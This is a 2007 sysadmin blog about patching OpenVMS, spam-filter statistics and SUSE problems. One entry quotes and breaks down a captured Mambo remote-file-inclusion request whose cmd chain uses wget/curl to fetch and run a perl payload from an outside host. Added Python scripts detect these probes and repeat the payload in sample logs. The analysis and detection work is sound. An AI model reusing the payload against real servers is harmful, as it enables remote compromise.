27-Sep-2007

PatchTime
Last weekend I downloaded the latest patches for VMS directly from Diana, but for some reason the files were corrupted and couldn’t be handled properly. Tonight I got them all via Aphrodite. In preparation for installing them, I made an image backup of the system disk. Of course, some files were locked for write, so the latest updates will be missing – but these are all log files and are not of interest on restore.
The most basic ones have been installed – within half an hour, including 2 reboots. The only problem is that the T4$BATCH queue doesn’t start. The current collection was stopped on the first reboot… Well, not much lost there.
There are some more patches: DECwindows, the TCPIP stack and the printer control system (DCPS) have ECOs and I downloaded them all – except for the latest DCPS, because that one seems to be missing on the HP site.
I will also install the latest versions of development tools and languages so I’m up to date. MySQL 5.1 is another possibility; I don’t know whether I have to retrieve a newer kit. For Python and related stuff, I’ll need one anyway. Rdb? I have the kit, but the PHP module is missing; I might be able to use the Oracle extension when SQLServer is installed as well (which will be the case).
I may run out of memory, so Diana will need some tuning. It’s needed anyway, even without these installations 🙂 Or I should get myself a new box – with more memory. There are other machines; these could be enabled – with a local system disk and limited functionality. We’ll see.
Another thing to watch is WordPress 2.3, just out. I’ll wait some time; it requires database updates and that is something to be checked first. Perhaps the new MySQL version may require a rebuild of the extension, as done before. Or Jean-Francois must have one at hand.
Anyway, Diana seems to be happy – it appears faster than before the patches.
Suse troubles
Iona – running Suse 10.2 – refuses to play audio CDs, without notice. Helix pops up when an audio CD is inserted, and disappears as soon as the CD is to be started. Even manual access causes the program to hide away somewhere. The music can be imported, so I can play the CD, but only after it has been copied to the hard disk. That is not what I expected.
Firefox leaves some bits hanging when stopped, and the machine needs a reboot – logging out alone is not enough. Even logging in as a different user doesn’t work.
Another annoying thing is that the box is really slow when importing music, and it looks like processes are swapped out of memory. At some point Firefox didn’t do anything at all, so I stopped it – using the Gnome monitor (which consumes a great deal of CPU as well: I found over 33%!)
Would 512 MB of internal memory really be too small for Suse to run?

23-Sep-2007

Anti-spam results
It looks great – but that was to be expected.
Since I can now do reports (loading the previous files hasn’t succeeded yet), this month shows:

149 messages filtered, of which 63 were delivered (one slipped the filter because it doesn’t have the appropriate rule), meaning 86 were filtered, 252 blacklisted and 2 relay attempts (of which one is the ISP test). Up to this moment (20:45 system time). The latter two were found by examining the logfiles only; these are not yet incorporated in the reports.

So of 338 messages, just 63 are acceptable. That is less than 20%!

The one that slipped consists of almost nothing but words broken up by punctuation. I guess it’s one of those things that are hard for the system to see. One note to send to Process, including a few requests on reporting…

Web content
is getting on. Today I added last weekend’s walks that finished the Krijtlandpad in the south of the Netherlands, this year’s holiday to Scotland and two trips we did in the past.
Also, the back link into the blog has been updated in all image index pages, so hitting the up arrow will return to the correct post. This may need an alternative naming method; I’ll have to dig into that.

Software trouble
The PHP engine gets more and more trouble with the template – it rains errors like:

%HTTPD-W-NOTICED, 23-SEP-2007 20:58:52, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 192.168.0.33
-NOTICED-I-URI, GET (29 bytes) /tracks/wp-admin/link-add.php
-NOTICED-I-SCRIPT, /tracks/wp-admin/link-add.php tracks:[wp-admin]link-add.php (cgi_exe:phpwasd.exe) TRACKS:[wp-admin]link-add.php
-NOTICED-I-CGI, (sessionId)(62 bytes) %DEBUGBOOT-W-CHN, assign channel system service request failed
-NOTICED-I-RXTX, err:0/0 raw:934/0 net:934/0

I don’t understand the “%DEBUGBOOT-W-CHN, assign channel system service request failed” message; I cannot locate the value anywhere. It must be caused by the heavier load this template puts on the system, it seems – everywhere. Not just in the admin pages, also on the ‘normal’ pages. I already stripped a lot of additional processing; perhaps that helps.

Also, MySQL crashed for some reason this evening. A similar crash to the last one.

It’s about time to create the native blog program…

18-Sep-2007

Reports work!
Thanks to Process.com the reports can now be created: I had to remove the database files and rerun the report generator. That did the trick. Next is to add the older logs into the database – there is no simple solution at the moment that either adds all files into one big PMAS.LOG file, or renames each historical file to PMAS.LOG and processes it.
Something to deal with later on.
The messages that have been blocked because the domain is blacklisted cannot yet be added. But who knows. A future release may offer these facilities.

In future, I may publish some data. Probably monthly statistics.

17-Sep-2007

Anti-spam results
One full week of activity:

* Passed: 123 messages (either because the content was OK, or the sender has explicitly been allowed (so no check is done))
* Quarantined: 110 messages, 8 false positives (of which a few are normally considered SPAM but I opted in)
* Discarded: 52, 4 false positives
* Blocked on RBL: 581 (in total, I did not filter off same IP addresses – that wouldn’t have happened using the previous method)
* Relay attempts: 17 (apart from the two I did myself)

All in all it means that about 750 messages didn’t make it to VMS mail. That is, on average, 100 a day. 2/3 of them because the domain is blacklisted.

SMTP did discard a few messages by its configuration, mainly based on domain (gmail and hotmail, for instance), but I removed these restrictions because the spam filter seems to be working pretty well.

This spam filtering has some side effects. None of them really serious.

Since these messages are no longer passed to the VMS SMTP client, they no longer show up in OPERATOR.LOG. As a result, the spam report that is updated daily won’t contain any new entries. That is reflected in this report: the anti-spam filter was put in place on 08-sep-2007, in the evening (when I installed the license and did some minimal configuration):

8-SEP-2007 18:56:55.54 CLNTINRBL 216.130.65.7
9-SEP-2007 00:15:04.78 UNRSLVMF cutie@mailroad.org
9-SEP-2007 10:08:24.36 UNRSLVMF kritzingerzndw@vnux.com
9-SEP-2007 11:25:32.34 BADMF fdophdi@gmail.com
9-SEP-2007 18:18:18.62 UNRSLVMF Schwabuuys@163data.com.cn
11-SEP-2007 02:33:18.76 UNRSLVMF Paulus_eobio@163data.com.cn
12-SEP-2007 15:20:45.53 BADMF sarah9dale@hotmail.com
13-SEP-2007 20:37:52.66 NOSPAMRLY 127.0.0.1 as suspected SPAM ramon@vennik.com
15-SEP-2007 18:54:53.86 UNRSLVMF sac10125@teensadolescentes.com
16-SEP-2007 20:46:22.79 UNRSLVMF kees@mirabilis.com

The last of the “old” config is the one on 8-sep-2007 18:56 – and PMAS came into effect at about 20:00.

On 13-sep-2007 I lifted the restrictions in the VMS SMTP server:

$ dir/dat tcpip$smtp_common:smtp.config

Directory SYS$SPECIFIC:[TCPIP$SMTP]

SMTP.CONFIG;58 13-SEP-2007 20:40:03.83
SMTP.CONFIG;57 12-SEP-2007 22:14:14.52
SMTP.CONFIG;56 5-JUL-2007 21:44:35.69

Total of 3 files.

so the one on that day is actually correct: the configuration file was changed after that message was received. Because SMTP had to be stopped and started, it’s even later than the file date.

Why the last two slipped through the filter, I don’t know. Neither of them can be found in the PMAS logging, so they have not passed through the normal route. They haven’t come from the webserver either – there is no hit in any of the logs for these timestamps.

The good news is that Operator.log is no longer poisoned with these messages, causing a drastic decrease in size. It’s now about half the size it used to be.
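
The reasoning above, that an entry stamped after a cut-over time cannot have come through the normal route, is easy to mechanise. The script below is an added example, not the author’s daily spam report script: it parses the OPERATOR.LOG rejection lines quoted above (VMS timestamp with hundredths of a second, reason code, detail), counts them per reason code, and lists the entries logged after a given cut-over. The two cut-over times are taken from the post (PMAS in effect at about 20:00 on 8-SEP-2007; SMTP.CONFIG;58 written at 20:40:03.83 on 13-SEP-2007), and SAMPLE holds the ten entries quoted above.

```python
"""Parse the OPERATOR.LOG spam-rejection entries quoted above, count them
per reason code and pick out the ones logged after a cut-over time.
Added example, not the author's daily report script; SAMPLE holds the
ten entries quoted in the post."""
from collections import Counter
from datetime import datetime

SAMPLE = [
    '8-SEP-2007 18:56:55.54 CLNTINRBL 216.130.65.7',
    '9-SEP-2007 00:15:04.78 UNRSLVMF cutie@mailroad.org',
    '9-SEP-2007 10:08:24.36 UNRSLVMF kritzingerzndw@vnux.com',
    '9-SEP-2007 11:25:32.34 BADMF fdophdi@gmail.com',
    '9-SEP-2007 18:18:18.62 UNRSLVMF Schwabuuys@163data.com.cn',
    '11-SEP-2007 02:33:18.76 UNRSLVMF Paulus_eobio@163data.com.cn',
    '12-SEP-2007 15:20:45.53 BADMF sarah9dale@hotmail.com',
    '13-SEP-2007 20:37:52.66 NOSPAMRLY 127.0.0.1 as suspected SPAM ramon@vennik.com',
    '15-SEP-2007 18:54:53.86 UNRSLVMF sac10125@teensadolescentes.com',
    '16-SEP-2007 20:46:22.79 UNRSLVMF kees@mirabilis.com',
]

# Cut-over times taken from the post.
PMAS_LIVE = datetime(2007, 9, 8, 20, 0)                              # PMAS in effect ~20:00
SMTP_RESTRICTIONS_LIFTED = datetime(2007, 9, 13, 20, 40, 3, 830000)  # SMTP.CONFIG;58


def parse_entry(line):
    """Return (timestamp, reason code, detail), or None if the line is not
    a rejection entry. VMS timestamps carry hundredths of a second; %f
    accepts 1-6 digits, so '.54' parses as 540000 microseconds."""
    fields = line.strip().split(None, 3)
    if len(fields) < 3:
        return None
    try:
        ts = datetime.strptime(fields[0] + ' ' + fields[1], '%d-%b-%Y %H:%M:%S.%f')
    except ValueError:
        return None
    detail = fields[3] if len(fields) > 3 else ''
    return ts, fields[2], detail


def parse_log(lines):
    """All parseable entries, in file order."""
    return [e for e in (parse_entry(line) for line in lines) if e is not None]


def count_by_reason(entries):
    """How many rejections each reason code accounts for."""
    return Counter(code for _, code, _ in entries)


def logged_after(entries, cutover):
    """Entries stamped later than the cut-over. With the filter in front of
    SMTP, anything here did not come the normal route and is worth a look."""
    return [e for e in entries if e[0] > cutover]


if __name__ == '__main__':
    entries = parse_log(SAMPLE)
    for code, n in count_by_reason(entries).most_common():
        print(f'{code:10} {n}')
    for ts, code, detail in logged_after(entries, SMTP_RESTRICTIONS_LIFTED):
        print(ts, code, detail)
```

Run against the entries above, the SMTP cut-over returns exactly the two entries of 15 and 16 September that the post cannot account for; the same function with PMAS_LIVE returns everything after the 18:56 entry.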

The third side effect will be that phishing attempts – like the ones I got from E[B/D]ay, Paypal and banks – won’t make it either. If they get into quarantine or are discarded, I could still pick them up. But quite likely their spamicity is so high (> 500) that they will be rejected anyway.

Side effects of changing web structure
Changes in the web structure should be taken into account when scanning the weblogs – and that is something I forgot. So the report on rejected calls contains a lot of actually valid accesses. Because the scan reads all present files and creates a full new report, I could update the script and rerun it to create new logs. Doing so, I found that a few lines seem to be far too long to process:

19:08:48.60 > Read 1000, Written 3
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:18 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstar
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:19 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaro
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:20 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaronline.com/https%20;perl%20https%20;c
19:08:53.18 > Read 2000, Written 16

Little problem to be solved ;) – it seems the longest records don’t fit:

Record format: Stream_LF, maximum 0 bytes, longest 731 bytes
Record attributes: Carriage return carriage control

That would not be a problem, would it?

I tried assigning a value to a symbol and that’s not a problem – I can add up to about 4000 bytes. So there is a difference in maximum size between directly assigning a value, and reading one from a file.

It happens rather seldom, so I won’t bother too much…

What was the attempt? The GET refers to a different file in each case:

GET /index2.php?
option=com_content&
do_pdf=1&
id=1index2.php?
....
GET /index.php?
option=com_content&
do_pdf=1&
id=1index2.php?
....
GET /mambo/index2.php?
....

but the code is the same in all three (it’s all on one line; for clarity, I split it up):


_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&
GLOBALS=&
mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&
cmd=cd%20/tmp;
wget%20ryanstaronline.com/https%20;
perl%20https%20;
curl%20-o%20http://ryanstaronline.com/https%20;
perl%20https;
%20;
echo%20YYY;
echo

w00tw00t*
A file often tried to be pushed or accessed is named “w00tw00t.at.isc.sans.<something>”. It doesn’t exist, of course. At least, it didn’t: I created one, for fun, to scare the kiddies off, to start with. Of course it doesn’t do any harm to them, for the time being: I may add some code to get as much data as possible and store it for reference and, in particular cases, publish it to the authorities. Not that it would help much, but they ask for it.
(Am I allowed to do so? Probably not, but I don’t care. I have enough indication that a file with this signature is often used to indicate an attempt to compromise the webserver. I don’t accept this and consider all rights to privacy of the individual void and of no value.)
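
The three requests taken apart above are a textbook Mambo/Joomla remote file inclusion: mosConfig_absolute_path is pointed at a URL on the attacker’s host so the vulnerable index2.php includes that file, and the semicolon-chained cmd= value fetches a perl script with wget or curl and runs it. Scanning such records in DCL runs into the command-element limit on the longest lines; a scanner in a language without that limit can pull the query apart and tag the indicators instead. The script below is an added example, not the author’s scanning script, and serves both the RFI analysis and the w00tw00t paragraph above: it parses combined-format web log lines, flags any parameter whose value points at a remote URL (the RFI vector), any value that chains fetch-and-execute tools with semicolons (command injection), and any request for the w00tw00t.at.isc.sans prefix, and it copes with records that were cut short. Every line in SAMPLE_LOG is constructed for this example, modelled on the requests quoted in the post; the probe suffix (the post gives only the prefix), the scanner’s private address, the response codes and the user agents are assumptions.

```python
"""Scan NCSA/combined-format web log lines for the two attack patterns
discussed above: a Mambo/Joomla-style remote file inclusion (an absolute
URL in mosConfig_absolute_path plus a shell command chain in cmd=) and the
w00tw00t.at.isc.sans.* scanner probe. Added example, not the author's DCL
scanning script; every line in SAMPLE_LOG is constructed for this example,
modelled on the requests quoted in the post."""
import re
from urllib.parse import unquote_plus, urlsplit

# Start of a combined log line up to the opening quote of the request.
# The request may be cut short (no closing quote, status or size), as in
# the records the DCL scan choked on, so it is taken up to the next quote
# or the end of the line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)')

# Tools an injected command chain typically calls to fetch and run a payload.
SHELL_TOOLS = re.compile(r'\b(wget|curl|perl|python|sh|bash|chmod)\b', re.I)

# Prefix of the probe file name; the post gives only this prefix.
PROBE_PREFIX = '/w00tw00t.at.isc.sans'


def parse_query(query):
    """Split a query string into (name, value) pairs by hand rather than
    with parse_qsl, which on older Pythons also splits on ';' and would
    hide the semicolon-separated command chain."""
    pairs = []
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def parse_line(line):
    """Parse one log record; returns None when it is not a log line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    request = m.group('request')
    fields = request.split(' ')
    target = fields[1] if len(fields) > 1 else ''
    parts = urlsplit(target)
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'method': fields[0],
        'path': parts.path,
        'params': parse_query(parts.query),
        # a complete request ends in the protocol version
        'truncated': not request.endswith(('HTTP/1.0', 'HTTP/1.1')),
    }


def classify(rec):
    """Tag a parsed record with the attack indicators found in it."""
    tags = set()
    if rec['path'].lower().startswith(PROBE_PREFIX):
        tags.add('w00tw00t-probe')
    for name, value in rec['params']:
        # a parameter pointing at a remote URL is the RFI vector itself
        if value.lower().startswith(('http://', 'https://', 'ftp://')):
            tags.add('rfi:' + name)
        # semicolon-chained fetch-and-execute commands = command injection
        if ';' in value and SHELL_TOOLS.search(value):
            tags.add('cmd-injection')
    if rec['truncated']:
        tags.add('truncated')   # the tail is missing: look at the raw record
    return sorted(tags)


def scan(lines):
    """Return (ip, path, tags) for every record carrying at least one tag."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec['ip'], rec['path'], tags))
    return hits


SAMPLE_LOG = [
    # the Mambo RFI request from the post, reassembled into one full record
    '212.72.162.197 - - [28/Aug/2007:08:56:20 +0100] "GET /mambo/index2.php?'
    '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
    'mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&'
    'cmd=cd%20/tmp;wget%20ryanstaronline.com/https%20;perl%20https%20;'
    'curl%20-o%20http://ryanstaronline.com/https%20;perl%20https;%20;'
    'echo%20YYY;echo HTTP/1.1" 200 4192 "-" "Mozilla/4.0"',
    # a scanner probe; the suffix after the prefix is made up
    '10.0.0.5 - - [01/Sep/2007:03:12:07 +0100] '
    '"GET /w00tw00t.at.isc.sans.probe HTTP/1.1" 404 213 "-" "-"',
    # a legitimate request to the blog's admin page
    '192.168.0.33 - - [23/Sep/2007:20:58:52 +0100] '
    '"GET /tracks/wp-admin/link-add.php HTTP/1.1" 200 9201 "-" "Mozilla/5.0"',
    # a record cut short, as happened to the longest lines in the DCL scan
    '212.72.162.197 - - [28/Aug/2007:08:56:18 +0100] "GET /index2.php?'
    'option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c',
]

if __name__ == '__main__':
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, path, ', '.join(tags))
```

The RFI test is deliberately generic (any parameter whose value is an absolute URL), because the parameter name varies per vulnerable script while the technique does not; the truncated tag exists so that a record the scan could not fully parse is still reported rather than silently dropped.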

13-Sep-2007

T4 batch stopped
T4 wasn’t started in the reboot, since the batch queue that holds these jobs (T4$BATCH) wasn’t started after the reboot. The job was there – two entries of T4$COLLECT, actually – but the queue was stopped and therefore both jobs were held.

So that is one thing to be changed: it has been the only issue that didn’t work on booting. It could be that it is just the queue that needs a review.

The job has now been rescheduled for next midnight – the right way, using T4$CONFIG.COM.